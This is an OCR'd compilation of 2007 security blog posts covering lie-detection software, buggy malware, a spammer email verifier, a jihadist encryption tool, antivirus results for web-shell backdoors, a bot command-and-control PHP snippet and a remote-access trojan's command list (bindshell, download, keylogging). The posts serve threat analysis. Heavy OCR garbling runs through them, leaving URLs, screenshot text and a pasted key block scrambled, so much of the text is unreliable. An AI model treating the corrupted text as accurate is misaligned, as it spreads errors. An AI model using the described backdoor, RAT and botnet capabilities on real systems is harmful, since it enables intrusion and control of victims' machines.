1. http: //en. wikipedia. org/wiki/Toxoplasma_gondii 


2. http: //www.newscientist.com/article/dni1516-parasite-hijacks-brains-with-surgical-precision.htm 
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3.4.5 Lie Detecting Software for Text Communications (2007-04-09 17:10) 


HENG 

LIANHE ZAOBAQ 
Singapore 
SINGAPORE 


SOS OO EI TLV IONAS SHELL ¥ GLSINOOUETD 


The art of money wasting when there’s a surplus of research grants and no one to pick them, 
or [1]a product concept myopia? $680,000 have been awarded by the U.S National Science 
Foundation to software developers to come up with a [2]lie detecting software for email, IM 
and SMS messages : 


" There’s still an open question of whether that is actually possible or not," [3]said Jeff 
Hancock , a communications professor and information science faculty member at Cornell. 
"Our research suggests that it is." Passive voice, verb tense changes, and even noun or verb 
selection can suggest a person is lying, he said . Hancock said another indicator of written 
deception is the decreased use of the word "I," which is most likely an attempt to create 
distance. "One of the reasons we think that works as an indicator is that pronoun use is 
subconscious," he said. In interactive speech, like instant messaging and some dialogues, 
liars go into a "persuasive mode" and increase the length of their message by 30 % to describe 
and explain situations, he said. Other factors - such as individual beliefs about behavior, 
whether someone is accused of something or interacting with an accuser - can complicate the 
proces. " 


Lies are creative even in a written form compared to the favorable body jestures that [4]speak 
for themselves. And | don’t really think an alert such as "the suspect’s talking too much on 
a one sentence question" would do any good. It’s all about doing your homework, having 
experience, not being naive and the power to remain silent when someone’s lying to you - 
lying pattern intelligence gathering . On the other hand, the product concept myopia is a 
situation where a company falls in love with their product or service and establish the "build 
it and they’ll come" mentality even without bothering to assess whether or not the market’s 
environment is willing to embrace it, can afford it, or actually need it . The less market 
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transparency, the better for the company, the better the market transprancy the better the 
puchasing decision of the customer who’ll realize that the solution doesn’t have to be in the 
form of the offered product. My point is that, despite the need for the detection of lies of text 
communications, the solution may not come in the form of talk pattern detection, for instance, 
your overhyped lover tells you he’s in Paris, but geolocating your communicating with him 
you see he’s in Frankfurt, and what a coincidence that is since his ex also lives there. 


Using [5]Enron, the infamous [6]case study that’ll be discussed in business school for 
years to come is a good analogy. But just because you think you’ve established a pattern of 
communication - lies - in conversations that are fake by default, doesn’t mean you'll be able 
to build the dynamics of lying into a detectable pattern. Detecting lies on the fly remains futile 
for the time being, and you really don’t need a program to tell you if someone’s lying to you 
especially in a written form. Outsmart them, act like you don’t know to get intelligence on their 
lying pattern , remain silent for a short timeframe, they'll lie again, be prepared and hopefully 
you'll recognize a new pattern. Enron’s past communication shouldn’t be the benchmark 
in this case, try some [7]Fool’s day press releases like this [8]PirateBay announcement for 
finding a permanent hosting solution - in North Korea! Average people’s patterns are the 
same, therefore pretend to be a moron when you’re most knowledgeable, and pretend to be 
weak when you’re most strong and | guarantee you a quick reboot of your relationships. 


The lines between sarcasm and a lie are getting even more blurred these days. 


1. http: //en.wikipedia.org/wiki/Marketing_myopia 
2. http://www. informationweek.com/software/showArticle. jhtml?articleID=19870110 


3. http://www.cis.cornell.edu/hancock.htm 


4. http: //ddanchev. blogspot .com/2006/11/how-to-tell-if-someones-lying-to-you.htm 


5. http: //ddanchev. blogspot .com/2006/09/visualizing-enrons- email .htm 

6. http: //ddanchev. blogspot .com/2006/06/there-you-go-with-your-financial.htm 
7. http: //en.wikipedia. org/wiki/April_1,_2007#In_websites 
8. http: //slashdot.org/article.pl?sid=07/04/01/1342236&from=rss 


3.4.6 Month of Malware Bugs Coming (2007-04-10 14:47) 


This will prove to be [1]interesting as it’s directly related with a previous discussion on [2]hi- 
jacking or shutting down someone else’s botnet through exploiting vulnerabilities in their code: 


"During each day of the Month of Bug Bugs McAfee Avert Labs will provide analysis of 
flawed malicious code (aka bugs). These are viruses that don’t spread, password stealing 
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Trojans that can’t leave the stable, drive-by attacks that crash and burn, phishing attacks that 
phlop, denial of service attacks that are denied, etc. Our analysis will highlight the errors 
made by authors, and show how these threats can be fixed and in most cases optimized for 
maximum potency. " 


Have you ever imagined that as a pen tester or security consultant you'll have to ex- 
ploit XSS vulnerabilities in a botnet’s web C &C in order to take a peek inside? Botnet 
polymorphism in order for the botnet to limit the possibility of establishing a communication 
pattern - an easily detectable one - is just as important as is the constant diversification 
towards [3]different communication platforms. Despite that malware authors are consistently 
creative, and efficiently excelling at being a step ahead of the security measures in place, 
they’re anything but outstanding programmers, or at least don’t put as much efforts into Q &A 
as they could. Aren’t malware coders logically interested in [4]benchmarking and optimizing 
their "releases", do they have the test bed in terms of a virtual playground to evaluate 
the effectiveness of their code, or are they actually enjoying a "release it and improve it on 
the fly" mentality? It’s alla question of who the coders are, and how Serious are their intentions. 


In a [5]very well structured paper courtesy of Symantec, the author John Canavan looks 
are various bugs in popular malware such as the Morris worm, Sobig, Nyxem, OSx.Leap, as 
well as Code Red Worm, W32.Lovgate.A@mm, W32.LogitallA@mm, VBS.SST@mm, VBS.Pet 
_Tick.N, W32.Beagle.BH@mm, W32.Mytob.MK@mm. Rather interesting fact about the much 
hyped Nyxem : 


" However something that was overlooked in a lot of reports at the time was this bug in 
the code, which meant 


that the worm would not overwrite files on the first available drive found. For example if the 
first available drive is the C drive, the worm will overwrite files in available drives from D to Z. 


Looking forward to seeing the bugs due to be highlighted in the MoBB. 


1. [aps / Fave avert abe, con/vesoareh/blog/ tp 209 
2. heup:/ /uww.Limuxsecurity.con/docs/ealvare- trends. pal 

3. http: //ddanchev. blogspot . com/2007/03/botnet - communication-platforms .html 

4. netp:/ /ddanchev. blogspot .con/2006/00/benchiar King and- opt imising-nalvare tal 
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3.4.7 Shots from the Malicious Wild West - Sample Four (2007-04-10 15:16) 


& High Speed Verifiar: Ready... 


Ready 


Check Finish to start veriing process. Upon verifing 


completion you can return to the Wizard and run it with 
> » 
_ @ High Speed Verifier - maillist.txt 


Step 1/3 source file processing .. COMPLETE 
(CUOHUHUUN HOO HUUHHHUHHOHHOHUHOOHOHHUHOUNUHHHH RH HO HH Re) 


Statatic 


Total ines loaded: 1015142 Processed domains: 109446 
Vabd emails: 906540 Domains in process: 0 
Unwerhed emai: 8346 DNS eres: 16114 
Bad emai: 94917 Elapsed tine: 01:07:79 
Inconect ines: 28 Speed lemais/sect 0.00 


Veeting threads 
Each thread generates about 0.30 kbps of network teallic. 


145 theead(s) 


1 thread 300 threads 600 threads 


COMPLETE 


Step 2/3 saving esas 


Step 3/3: cleanup... 
(veenne 


Cancel | 


My previous "shots" related to various pieces of malware, packers, or on the fly malicious 
URL analysis will continue to expand with the idea to provide you with screenshots of things 
you only read about, but never get the chance to actually see. In the first shot | discussed 
[1]ms-counter.com, in the second the [2]Pohernah crypter, and in the third [3]The Rat! 
Keylogger. You may also find a recent post related to the [4]dynamics of the underground’s 
economy, as well as the related screenshots very informative. 


In this virtual shot I’ll discuss the [5]High Speed Verifier, a commercial application spam- 
mers use to filter out the fake and non-existent emails in their spam databases in order to not 
only achieve a faster speed while sending their message out, but also improve the quality of 
their databases which | love poisoning so much. What the High Speed Verifier all about? As 
its authors state : 


" HSV detects about 20-30 % of invalid addresses in a mailing list, though theoretically 
it is possible to detect up to 60-70 % using a software product. This figure seems relatively 
small, but actually it might make 10 % of a list. Besides, HSV provides for optimal checking 
mode in terms of time and data traffic. More thorough checking (with which the rest 40 % of 
invalid addresses could be detected) takes 10 times longer and requires 5 times greater traffic 
for each address, hence it’s not that advisable with huge lists. " 


So once [6Jemails are harvested, they have to be verified and then abused for anything 
starting from [7]phishing attacks to good old fashioned [8]social engineering tricks decepting 
users into executing malware or visiting a site for them to do so. Don’t get too excited, the 
[9]Jadvanced version has even more interesting features : 
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4 W.Ist - Advanced Maillist Verify 
File View Check Help 


Processed Emails Result Comment 


sales@coffeecup.com Exist mail.coffeecup.com "250 <sales@coffeecup.com>... Recipient ok" 
4 reseller@coffeecup.com Exist mail.coffeecup.com "250 <reseller@coffeecup.com>.., Recipient ok" 
specials@coffeecup.com Exist mail.coffeecup.com "250 <help@coffeecup.com>.., Recipient ok" 
(4 Support@maxxchat.com Exist mail.beFfound.com "250 Requested mail action okay, completed" 

4 Fchend000@usa.net Exist mxpool01.netaddress.usa.net "250 Recipient OK (714qDLsEj1115... 
smud@twyst.org Exist mail.twyst.org "250 2.1.5 <smud@twyst.org>... Recipient ok 

£4) kindaichi@usa.net Not exist (SMTP) mxpool01.netaddress.usa.net "550 <kindaichi@usa.net>... User... 


fil robyrobo@usa.net Log for “Pongpun Bouphet" <kindaichi@usa.net> 


hf matro net 

sbieteigaa . Found 1 relay[s) (mxpool01 netaddress.usa.net [10]) 
Jon2002@usa.net Check via mxpool01 netaddress.usa.net SMTP-server 
£48) slimticker@usa.net i Connecting to SMTP server... 


se) biggieboysoft@usa.net i Connected with SMTP-server 

G nir-z@usa.net ; 220 cmsmail0?.cms.usa.net ESMTP USA.NET-SMTA vCM.1201.1.04; F 
= : HELO sl?2-13.mn.ru 

tg) Andrew-Ross@usa.net i 250 cmsmail0?.cms.usa.net Hello sl72-13.mn.ru [65.32.153.11], pleasec 
£@ cenkersisman@usa.net i MAIL FROM:< verify@testmail. com> 

2 ‘ 250 Sender OK 

Ea woodyg@usa.net RCPT TO:<kindaichi@usa.net> 

sales@chatspace.com 550 <kindaichi@usa.net>... User not known 

garzman@inter net. il i RSET 


MA webmaster@getinthering.com Exist a 4 eset state 


MM king@digi-net.com Exist mxpool01 netaddress.usa.net "550 <kindaichi@usa.net>... User not kno a 
4 dirc@dragonmount.net Exist — 


4 winip@dragonmount.net Exist bellat.pair.com "250 ok" 


Check running, please wait... ff —_—sY Total: 9977 Inchk: 12 Chkd: 759 


"The program works on the same algorithm as ISP mail systems do. Mail servers ad- 
dresses for specified address are extracted from DNS. The program tries to connect with 
found SMTP-servers and simulates the sending of message. It does not come to the mes- 
sage sending — AMV disconnect as soon as mail server informs does this address exist or not. " 


The old dillema is still place - direct online marketing VS spam or what’s the difference 
these days if any? Marketed as tools to assist online marketers these programs are [10]logi- 
cally abused by [11]spammers, phishers and everyone in between. 


1. http: //ddanchev. blogspot .com/2007/03/shots-from-malicious-wild-west-sample.htm 

2. http: //ddanchev. blogspot .com/2007/03/shots-from-malicious-wild-west-sample_10.htm 
3. http: //ddanchev. blogspot .com/2007/03/shots-from-malicious-wild-west-sample_3723.htm 
4. 

5. 

6. http: //ddanchev.blogspot .com/2007/01/inside-email-harvesters- configuration. htm 

7 

8. 

9 

10. http://ddanchev. blogspot .com/2007/02/image-blocking- in-email-clients-and-web.htm 
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11. http: //ddanchev.blogspot.com/2006/09/email-spam-harvesting-statistics.htm 


3.4.8 Mujahideen Secrets Encryption Tool (2007-04-12 14:58) 


GIMP Software fe 
MOJAHEDEEN SECRETS 


Version 1.0 


_ Ant-Symmctric ASA Keys 


User ID Lenath | Creation kas 
Te Pub/Priy  peLeell pel el SCS4BSFA 48) = 04/1142006 
Solos'l aed! we 5D376133 = 248 )=—-09/11/2006 
ged stl ob lane py! n2NMacD =©6 4809112006 
\496D920F | 09/11 72006 [Mi 


File Shredder ) Recipient ID Recipient User ID 
_ 5 L, KeyID |496D920F User ID |g % jell eae oi f Clear 
Keys Manager ) ee 
Symmetric Cipher Algonthm Stealthy Cipher a 
; Options ) |Riindael with 256 bit key (AES) x M& Activate Stealthy Cipher AN 
About ) 


& Select... 


Select File to Decrypt 


| & Select... 


| Compression: 1785.2°% 


Cipher: Mars, Key size: 256 


abit rey > |) tS) Ag 3 eI of! eed rq et al ete dl mud del J! dao gt 1 -) 


Remember [1]Mujahideen Secrets, the [2]jihadist themed encryption tool released by the 
Global Islamic Media Front (GIMF) to aid cyber jihadists about to convert to cyber terrorists in 
encrypting their communications? See the attached screenshot - if only could jihadists see 
through the eyes of the multilingual crawler or knew | violate their OPSEC on a daily basis. The 
interesting part from a PSYOPS perspective is how they’ve realized that using PGP no longer 
means improved and sustained self-esteem for the average jihadists, so coming up with their 
very own encryption tool and file shredder is a logical step. Encryption, even [3]steganography 
has been used by terrorists for years, and despite that no one is feeling comfortable with the 
idea, it’s an unspoken fact. There’s also something else to keep in mind, terrorists are putting 
more efforts into recruiting knowledgeable individuals than trying to educate them from day 
one. And while coding the mujahideen secrets software requires nothing more than a simple 
GUI and publicly obtained encryption libraries, | wonder did the people behind it on purposely 
knew who they’re compiling the tool for, or was it a part time project on a "need to know basis"? 


Encryption algorithms’ sophistication in respect to the key’s size shouldn’t really be of 
any concern in this case, 
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#--Begin GIMF ASRAR E! Moujahedeen 1.0 Public Key 2048 bit-— 
pyHAvSRbPuhWinwfeX+KjrJkSINBinCl1 sKNSCqTbYZR3KEngjkOhc1 GXWhJ 
U7QpiWLsaR6GJ+rsqSe8J5zJSh50PCrzv2+K540q0MMwi8udJ5LpiWm20loTy 
tiOVrNxSXiOMpohzc+pWOwMNDdaSKWV1lOyXc+kd3ybF RIMXNXNUKPwDCn 
XPtSFNIWY BvJVuBWn4 VATNTrOdzw2uT MJcNo3IGOQA/h YDAOWY6bm+GZ 
QL+6 1gXzLv52gg9X8F xleQvieG+sSt8sjThHGWO2WOWNGPSinwMGO0ZtGaM 
eVymEKdTKOxCW3Wmib0i4qLi¥xXCEq/JqQosrMPuXd4J4VTQLOB3I7YkKSNy 
910BgAm=+mbNJjkISiko+mlAjDOMmjO+3niP/t1 S/Ezqb/+8EZvbriqmpBy2Jd 
mm6CNTGX1PDLaGhPibT DnzL2WaghB7134YX1 ESXp/QXV7 eKabdp6BkCahw 
8ZdDPcoLQzUbHswiRt8xcuSVitujCZ9Ds8OMhQaVizzXzCU 1rt ApzWsiEu74cU 
RAKCma@SbM2h1 |GuSbastL/dUn/goxPGaT KifvMg== 

#---End GIMF ASRAR El Moujahedeen 1.0 Public Key 2048 bit—-- 


but how come? Simple, the lack of quality passphrases, even implementation of the algorithms 
into the software, combined with client side attacks seeking to obtain the passphrase compared 
to perhaps futile bruteforcing, speak for themselves. One thing remains for sure - they’re 
encrypting and generating more noise than originally thought. Go through an [4]analysis of 
the Technical Mujahid Issue One as well. 


1. http://www.zone-h.org/content/view/14486/30/ 
2. http: //ddanchev. blogspot .com/2007/02/terrorism-and-encryption.htm 
3. http: //ddanchev. blogspot . com/2006/08/steganography-and-cyber-terrorism.htm 


4. http://ddanchev. blogspot .com/2006/12/analysis-of-technical-mujahid-issue-one.htm 


3.4.9 A Compilation of Web Backdoors (2007-04-20 00:58) 


©) Mozilla Firefox 


File Edit View Go Bookmarks Tools Help Q| 


& Dt? 4 ® http: || ie backdoor. jsp | iG 


Mozilla Firebird Help |] Mozilla Firebird Discu... |] Plug-in FAQ | | SIG*2 News 
LJ 


JSP Backdoor Reverse Shell 
IAddess[  Pot{ | Connect | 


| Done 


S 


The other day | came across to a nice [1]compilation of web backdoors only, and decided to 
verify how well are various AVs performing when detecting them : 


"| have collected some [2]WEB backdoors in the past to exploit vulnerable file upload 
facilities and others. | think a library like this may be useful in a variety of situations. Under- 
standing how these backdoors work can help security administrators implement firewalling 
and security policies to mitigate obvious attacks. " 


Here are some results listing the AVs that detected them - as they should : 
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name: cfexec.cfm 

size: 1328 

md5.: cce2f90563cb33ce32b6439e57839492 

shal: 01¢50c39e41c6e95262a1141dbfcbf9e8f14fc19 


_No AV detects this one 


name : cmdasp.asp 

size: 1581 bytes 

md5: d0ef359225f9416dcf29bb274ab76c4b 

shal: 9df3e72df372c41fe0a4d4fle940f98829b752e1 


Authentium 4.93.8 04.14.2007 ASP/Ace.G@bd 

Avast 4.7.981.0 04.16.2007 VBS:Malware 

BitDefender 7.2 04.16.2007 Backdoor.ASP.Ace.C 
ClamAV devel-20070312 04.16.2007 ASP.Ace.C 

DrWeb 4.33 04.16.2007 BackDoor.AspShell 

Ewido 4.0 04.16.2007 Backdoor.Rootkit.10.a 

F-Prot 4.3.2.48 04.13.2007 ASP/Ace.G@bd 

F-Secure 6.70.13030.0 04.16.2007 ASP/Ace.G@bd 
Kaspersky 4.0.2.24 04.16.2007 Backdoor.ASP.Ace.q 
Microsoft 1.2405 04.16.2007 Backdoor:VBS/Ace.C 
Symantec 10 04.16.2007 Backdoor.Trojan 

VBA32 3.11.3 04.14.2007 Backdoor.ASP.Rootkit.10.a #1 
Webwasher-Gateway 6.0.1 04.16.2007 VBScript.Unwanted.gen!FR:M-FW:H-RR:M-RW:M-N:H- 
CL:H (Suspicious) 


name: cmdasp.aspx 

size: 1442 

md5.: 27072d0700c9f1db93eb9566738787bd 

shal: 2c43d5f92ad855c25400ee27067fd15d92d1f6de 


_No AV detects this one 


name: simple-backdoor.php 

size: 345 

md5.: f¢d01740ca9d0303094378248fdeaea9d 

shal: 186c9394e22e91ff68502d7cla71le67c5ded67c c 


_No AV detects this one 


name: php-backdoor.php 

size: 2871 

md5.: 9ca0489e5d8a820ef84c4af8938005d5 

shal: 89db6dc499130458597fe15f8592f332fb61607e 


AhnLab-V3 2007.4.19.1/20070419 found [BAT/Zonie] 
AntiVir 7.3.1.53/20070419 found [PHP/Zonie] 
Authentium 4.93.8/20070418 found [PHP/Zackdoor.A] 
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AVG 7.5.0.464/20070419 found [PHP/Zonie.A] 
BitDefender 7.2/20070419 found [Backdoor.Php.Zonie.B] 
F-Prot 4.3.2.48/20070418 found [PHP/Zackdoor.A] 
F-Secure 6.70.13030.0/20070419 found [PHP/Zackdoor.A] 
Ikarus T3.1.1.5/20070419 found [Backdoor.PHP.Zonie] 
Kaspersky 4.0.2.24/20070420 found [Backdoor.PHP.Zonie] 
McAfee 5013/20070419 found [PWS-Zombie] 

Microsoft 1.2405/20070419 found [Backdoor:PHP/Zonie.A] 
NOD32v2 2205/20070419 found [PHP/Zonie] 

Norman 5.80.02/20070419 found [PHP/Zonie.A] 

VBA32 3.11.3/20070419 found [Backdoor.PHP.Zonie #1] 
Webwasher-Gateway 6.0.1/20070419 found [Script.Zonie] 


name: jsp-reverse.jsp 

size: 2542 

md5.: ebf87108c908eddaef6f30f6785d6118 

shal: 24621d45f7164aad34f79298bcae8f7825f25f30 


_No AV detects this one 


name: perlcmd.cgi 

size: 619 

md5.: c7ac0d320464a9dee560e87d2fdbdb0c 

Shal: 6cd84b993dcc29dfd845bd688320b12bfd219922 


_No AV detects this one 


name: cmdjsp.jsp 

size: 757 

md5.: 3405a7f7fc9fa8090223a7669a26f25a 

shal: 1d4d1cc154f792deal194695f47e17f5f0ca90696 


_No AV detects this one 


name: cmd-asp-5.1.asp 

size: 1241 

md5.: eba86b79c73195630fb1d8b58dal13d53 

Shal: 22d67b7f5f92198d9c083e140ba64ad9d04d4ebc 


Webwasher-Gateway 6.0.1/20070419 found [VBScript. Unwanted.gen!FR:M-FW:M-RR:M-RW:M- 
N:H-CL:H (suspicious) ] 


Rather interesting, there have been [3]recent targeted attacks aiming at gullible admins 
who'd put such web shells at their servers, thus opening a reverse shell to the attackers. 
As always, this compilation is just the tip of the iceberg, as Jose Nazario points out having 
variables means a different checksum, and considering the countless number of ASP, PHP and 
PERL based reverse backdoors, the threat is here to remain as silent and effective as possible. 
Grep this viruslist, especially the [4JASP, PHP and PERL backdoor families to come up with 
more variants in case you want to know what’s already spotted in the wild. Here’s a very well 
written paper by Gadi Evron on [5]Web Server Botnets and Server Farms as Attack Platforms 
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discussing the economies of scale of these attacks. 


1 ftp: /aichasl dav. oxg/projocts/web-backdoor~compilation/ 
2. teps//rev.aune.cny/resources/nalvarefeq/revy_ebel pha 

4. 

5. 


http: //vx.netlux.org/vl.php?dir=virlist 


http://www. beyondsecurity.com/whitepapers/GadiEvron_VBFeb07. pdf 


3.4.10 Shots from the Malicious Wild West - Sample Five (2007-04-20 02:24) 


This program is free software; you can redistribute it and/or modify 
it under the terms of the GNU General Public License as published b 


the Free Software Foundation; either version 2 of the License’, or 
our option) any later version. 


HH HH HHH HH HHH HHH HH HHH HH HHH HHH HH HHH HHH HH HHH HH HHH HH HHH HHH HH HHH KH KKH KKK KK KKKKEKE f 


include(“config .php"); 
include(“auth.php"); 


$sql = ‘CREATE TABLE “botstatus* ( “id~ INT NOT NULL AUTO_INCREMENT ,' 
- ' “key” TEXT(¢ 56 ) NOT NULL ,' 
. " “status* TEXT( 18 ) NOT NULL ," 
. ' “ipaddr~ varchar( 26 ) default NULL ,' 
. * “count~ int default 6 ,* 
. * “ydate~ datetime default NULL ,* 
. " INDEX ( “id* ) )3 ‘5 
mysql _query("drop table botstatus") 5; 
mysql_query("$sql"); 


echo “YcTaHOBKa 3aBepuena”™ 5 
echo “<meta http-equiv=Refresh content=\"3; url=index.php\">"; 
?> 


Open source malware with a MSQL based web command and control? It’s not just Sdbot and 
Agobot being the most popular malware groups that have such features by default, but pretty 
much every new bot famility. The Cyber Bot, a malware on demand is one of these. Among 
the typical DDoS capabilities such as SYN,ACK, ICMP, UDP, DNS and HTTP post and get floods, 
it offers various rootkit capabilities in between the ability to bypass popular AV and firewall 
software. | recently located various screenshots from the web command and control which I’m 
sure you'll find enlightening. A picture is worth a thousand fears as usual. Rather interesting, 
the bot is able to figure out whether the infected user is on a LAN, dialup, or behind a proxy 
connection, the rest of the statistics such as IP geolocation and infected users per OS are turning 
into a modular commodity. It’s also worth noting that the web interface has the capability to 
offer access to the control panel to more than one registered user, which logically means that 
it’s build with the idea to provide rental services. 
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Here’s a related post with more [1]web command and control screenshots, and another 
one taking into consideration various [2]underground economics. 


1. http: //ddanchev. blogspot .com/2006/11/nuclear-grabber-toolkit.htm 
2. http: //ddanchev. blogspot . com/2007/03/underground-economys-supply-of-goods.htm 
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3.4.11 Shots from the Malicious Wild West - Sample Six (2007-04-20 03:06) 


BLACKSUN REMOTE CONTROL 


[ Napametppi nogwiovenna: | 
AOCT: 


Nopt: 
Norn: 


Naponb: 


sanonuHvte SBce nona dopme 


Continuing the "Malicious Wild West" series, the Blacksun RAT integration on the web is so 
modules-friendly it makes you wonder why it’s not another case study on malware on demand, 
but a publicly obtainable open source malware like it is. Process injections in explorer.exe by 
default, and with a default port 2121, this HTTP bot is still in BETA. And BETA actually means 
more people will play around with the code, and add extended functionalities into it. There’s 
a common myth that the majority of botnets are still operated through IRC based communi- 
cations, and despite that there’re still large botnets receiving commands through IRC, there’s 
[1]an ongoing shift towards diversification and HTTP in all of its tunneling and covert beauty 
seems to be a logical evolution. 
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BLACKSUHM REMOTE CONTROL SYSTEM 


[ CratuctuKa: ] 


[ YcTranonvtp Komanay Goran: | 


Beeante numa Gora (cumpon “*" - & 


Here are some commands included in default admin.php that speak for themselves : 


OPTION value=cmd 
OPTION value=cmd 
OPTION value=bindshell 
OPTION value=download 
OPTION value=ftp upload 
OPTION value=msgbox 
OPTION value=power 
OPTION value=monitor 
OPTION value=cdrom 
OPTION value=keyboard 
OPTION value=mouse 
OPTION value=crazymouse 
OPTION value=funwindows 
OPTION value=version 
OPTION value=exitprocess 
OPTION value=killmyself 


Killmyself is quite handy in case you get control of the botnet in one way or another 
and desinfect the entire population with only one command. Stay tuned for various other 
"releases" in the upcoming virtual shots during the next couple of days. 


1. http: //ddanchev. blogspot .com/2007/03/botnet-communication-platforms.htm 
821 


3.4.12 Google in the Future (2007-04-20 03:37) 


Google 208 


Google Search I'm Feeling Lucky | fm Feeling Paranoid 


VU Your Brain O Satellite Photos of People Books 


You Want to Spy On ; 
» Your Home O Movies 


J Satellite Photos of 
Family People Spying on You Y TV Shows 


U Friends D Medical Records UV Music 

S Ex-friends S Credit Reports VU Pornography 
J Relatives O Tax Records V Your Past 

Y Co-workers © Phone Records Your Present 
 Ex-spouse(s) OQ Court Documents V Your Future 


~ Enemies VU Other People's 
Conversations 


Great fake as a matter of fact. Don’t blame the crawler while crawling the public Web, but the 
retention of clickstreams for indefinite periods of time and the intermediaries selling them to 
keyword marketers. And of course the emerging centralization of [1]too much power online 
with its [2]privacy implications - power and responsibility must intersect. [3]Two more fakes 
for [4]you to enjoy. 


1. http://www.marketwatch.com/news/story/eu-privacy-body-criticizes-google/story.aspx?guid={7B578CE44F-EDC5 


43A8-865A-51960583F9D347D 
2. http: //www.wired.com/politics/onlinerights/news/2007/04/doubleclic 


3. http: //caglecartoons.com/images/preview//7BEO40B3EA- 39CF-4001-A1A6-896CAFA68798%7D. gif 


4. http://photos1.blogger. com/blogger/1933/1779/1600/google10yearsfromnow.0. jpg 
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3.4.13  OSINT Through Botnets (2007-04-23 18:06) 


[1]Open source intelligence gathering techniques from a government sponsored cyber espi- 
onage perspective have been an active doctrine for years, and that’s thankfully to niching 
approaches given the huge botnet infected network - government and military ones on an 
international scale as well. And yes, [2]targeted attacks as well. It’s a public secret that botnet 
masters are able to [3]geolocate IPs through commercially obtainable databases reaching 
levels of superior quality. Have you ever thought what would happen if access to botnet on 
demand request is initiated, but only to a [4]botnet that includes military and government 
infected PCs only? Here’s a related story : 


The misuse of US military networks by spammers and other pond life is infrequently reported, 
but goes back some years . In August 2004, we reported how blog comment spams promoting 
illegal porn sites were sent through compromised machines associated with unclassified US 
military networks. Spam 


advertising "incest, rape and animal sex" pornography was posted on a web log which was 
set up to discuss the ID Cards Bill via an open proxy at the gateway of an unclassified military 
network. " 


From an OSINT perspective, part by part a bigger picture emerges from the tiny pieces 
of the puzzle, and despite that these would definitely be unclassified, a clerk’s email today 
may turn into a major violation of OPSEC tomorrow . Moreover, the security through obscurity 
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approach of [5]different military networks might get a little bit shaken up due to the exposure 
of the infrastructure in a passive mode from the attacker’s perspective. 


In the wake of yet another [6]targeted attack on U.S government networks in the form 
of zero-day vulnerabilities in Word documents neatly emailed to the associated parties, it’s 
worth discussing the commitment shown in the form of the Word zero day, and the attach 
congressional speech to Asian diplomacy sent to Asian departments : 


"The mysterious State Department e-mail appeared to be legitimate and included a Mi- 
crosoft Word document with material from a congressional speech related to Asian diplomacy 
, Reid said. By opening the document, the employee activated hidden software commands es- 
tablishing what Reid described as backdoor communications with the hackers. The technique 
exploited a previously unknown design flaw in Microsoft’s Office software, Reid said . State 
Department officials worked with the Homeland 


Security Department and even the FBI to urge Microsoft to develop quickly a protective software 
patch, but the company did not offer the patch until Aug. 8 — roughly eight weeks after the 
break-in. 


The life of this zero day vulnerability started much earlier than anyone had predicted, 
and obviously specific emails of various departments are known, are harvested or obtained 
through the already infected with malware PCs - pretty much everything for a successful 
targeted attacks seems to be in place right? But what makes me wonder is where are the 
attacking emails originating from, an infected ADSL user somewhere around the world whose 
spoofed .gov or .mil email somehow made it not though and got undetected as spam, or from 
an already infected .gov or .mil host where the attackers took advantage of its IP reputation? 


In the majority of news articles or comments | come across to, reporters often make the 
rather simplistic 
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_Adetcrart Part of the “target list" from the Lycos site 
The numbers below show how response times have decreas¢ 


4 denial of service attack 


launched by users of the DOMAIN NAME Traffic 

MakeLoveN otSpam.com www. bokwhdok.com 5 1,93 Gb 
screensaver from Lycos www.rxmedherbals. info - 2,16 Gb 
Europe has crippled the blundering.subbvbvf.com - 8,45 Gb 


operations of several , 
enaniaites hosted on m39.computergearplus.com ,99 Gb 


Chinese web servers, but www.artofsense.com - 4,68 Gb 
some remain online. printmediaprofits. biz . 7,04 Gb 


printmediaprofits. biz bokwhdok.com 


Tine in seconds 


connection with China’s emerging cyber warfare capabilities - a little bit of [7]Sun Tzu as 
a school of thought and mostly rephrasing U.S studies - whenever an attacking email, or 
[8Jattack is originating from China’s netblocks. Perhaps part two of my previous post "[9]from 
the unpragmatic department" sparkled debate on [10]physically bombing the sources of the 
attacks, just to make sure | guess. Engineering cyber warfare tensions nowadays, providing 
that China’s competing with the U.S for the winning place on botnet and spam statistics for 
the last several years speaks for itself - the U.S will find itself bombing U.S ISPs and China 
will find itself bombing Chinese ISPs . So the question is - why establish an offensive cyber 
warfare doctrine when you can simple install a type of Lycos Spam Fighting screensaver on 
every military and government computer and have it periodically update its hitlists? 


Black humour is crucial if you don’t want to lose your real sense of humour, and thank- 
fully, for the time being an offensive cyber warfare provocation - or the [11]boring idleness of 
botnet masters - isn’t considered as a statement on war yet. [12]The Sum of All Fears’s an 
amazing representation of engineering tensions in real-life, so consider keeping your Cyber 
Defcon lower . 


Open source visualization courtesy of [13]NYTimes.com, [14]MakeLoveNotSpam’s effect 
courtesy of Netcraft. 


UPDATE: Apparently, [15]seven years ago North Korea’s hyped [16]cyber warfare unit was 
aware of the concept of targeted attacks so that : 


Kim Jong II visited software labs and high-tech hubs during his rare trips to China and Russia in 
2000 and 2001. When then- U.S. Secretary of State Madeleine Albright visited Pyongyang in 
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2000, he asked for her e-mail address. 


On a future visit, in a future tense, perhaps IM accounts would be requested to rotate 
the infection vectors. Meanwhile, read a great article on [17]North Korea’s IT Revolution, 
or let’s say a case study on failed [18]TECHINT due to a self-serving denial of the word 
globalization. 


 ibtp://adanchev .blogepot.con/2006/09 benefits-of-open-source- intelligence. hall 
_hetp://Adanchev blogspot .con/2006/08 /chinese-hackers-attacking-us. hen] 

| http://adanchev blogspot .con/2007/02/rootLauncher~kat html 

| http://www. theregister co. uk/2007/04/16/nilstary_ botnet / 


1 
2 
3 
4 
5. http: //ddanchev. blogspot .com/2006/09/biggest-military-hacks-of-all-time.htm 
6 
7 
8 
9 


_http://neus. yahoo. co/s/ap/20070419/ap.on,bi_te/hackers, state. departaent 
| netp:/ www. nd, o6u/inss/sive/ cht. hea 

_http:/ /any. fev. con/article97658-02- 19-07 VeblprintLayou! 

_http:/ /adanchev. blogspot .con/7007/04/preventing-nassive-al~qaeda- cyber. htal 
10, fttp: //ow netvorkvorld, con/nevs/2007/020807-ree~cyber-attacks html] 


. http: //en.wikipedia. org/wiki/The_Sum_of_All_Fears 
. http: //www.nytimes.com/2006/12/03/magazine/O03intelligence .html?ex=1322802000%en=46027 e63d79046cekei=5090 


. http: //news.netcraft.com/archives/2004/12/01/spam_sites_crippled_by_lycos_screensaver_ddos.htm 


15, 
16. 
18. 
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3.4.14 Shots from the Malicious Wild West - Sample Seven (2007-04-25 13:34) 


AhnLab-V3 2007 .4.25.0 04.24.2007 f C 

Antivir 7.4.0.15 04.24.2007 jno virus found 
